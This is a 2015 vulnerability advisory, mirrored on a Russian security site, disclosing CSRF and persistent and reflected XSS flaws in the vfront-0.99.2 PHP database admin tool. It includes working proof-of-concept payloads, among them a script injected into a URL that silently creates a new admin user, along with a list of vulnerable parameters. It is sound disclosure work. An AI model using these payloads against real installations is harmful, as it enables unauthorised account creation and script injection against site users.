Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Xloner v3.1.2 wordpress plugin authenticated command execution and XSS

  CVE-2015-4010 - Cross-site Request Forgery & Cross-site Scripting in Encrypted Contact Form Wordpress Plugin v1.0.4

  AnimaGallery 2.6 (theme and lang cookie parameter) Local File Include Vulnerability

  Symphony CMS 2.6.2

From:apparitionsec_(at)_gmail.com <apparitionsec_(at)_gmail.com>
Date:8 июня 2015 г.
Subject:vfront-0.99.2 CSRF & Persistent XSS



[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-VFRONT0602.txt



Vendor:
==============
www.vfront.org



Product:
=================================================================================
==
vfront-0.99.2 is a PHP web based MySQL & PostgreSQL database management application.



Advisory Information:
====================================
CSRF, Persistent XSS & reflected XSS



Vulnerability Detail(s):
=======================


CSRF:
=========
No CSRF token in place, therefore we can add arbitrary users to the system.


Persistent XSS:
================
variabili.php has multiple XSS vectors using POST method, one input field 'altezza_iframe_tabella_gid' will store XSS payload
into the MySQL database which will be run each time variabili.php is accessed from victims browser.


Persisted XSS stored in MySQL DB:
=================================
DB-----> vfront_vfront
TABLE-----> variabili
COLUMN------> valore (will contain our XSS)


Exploit code(s):
===============


CSRF code add arbitrary users to system:
=======================================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.
php?op="/><script>var xhr%3dnew XMLHttpRequest();xhr.
onreadystatechange%3dfunction(){if(xhr.
status%3d%3d200){if(xhr.
readyState%3d%3d4){alert(xhr.responseText);}}};xhr.
open('POST','utenze.db.php?insert_new',true);xhr.
setRequestHeader('Content-type','application/x-www-form-
urlencoded');xhr.
send('nome%3dhyp3rlinxe%26cognome%3dapparitionsec%26email
%[email protected]
com%26passwd%3dhacked%26passwd1%3dhacked');</script>
&tabella=&uid=&data_dal=All&data_al=All



Persistent XSS:
================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.
php?feed=0&gidfocus=0
Inject XSS into 'the altezza_iframe_tabella_gid' input field to store in database.
"/><script>alert(666)</script>



Reflected XSS(s):
=================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/query_editor.
php?id=&id_table=&id_campo="/><script>alert(666)<
/script>



XSS vulnerable input fields:
============================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php
altezza_iframe_tabella_gid   <------------- ( Persistent XSS )
passo_avanzamento_veloce_gid
n_record_tabella_gid
search_limit_results_gid
max_tempo_edit_gid
home_redirect_gid
formati_attach_gid
default_group_ext_gid
cron_days_min_gid

 

Disclosure Timeline:
===================================


Vendor Notification: May 31, 2015
June 2, 2015 : Public Disclosure



Severity Level:
===================================
High



Description:
==========================================================

Request Method(s):
                               [+]  GET & POST

Vulnerable Product:
                               [+]  vfront-0.99.2

Vulnerable Parameter(s):
                               [+] altezza_iframe_tabella_gid
   passo_avanzamento_veloce_gid
   n_record_tabella_gid
   search_limit_results_gid
   max_tempo_edit_gid
   home_redirect_gid
   formati_attach_gid
   default_group_ext_gid
   cron_days_min_gid
   id_campo
   op
  


Affected Area(s):               [+]  Admin & MySQL DB

===============================================================


(hyp3rlinx)

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород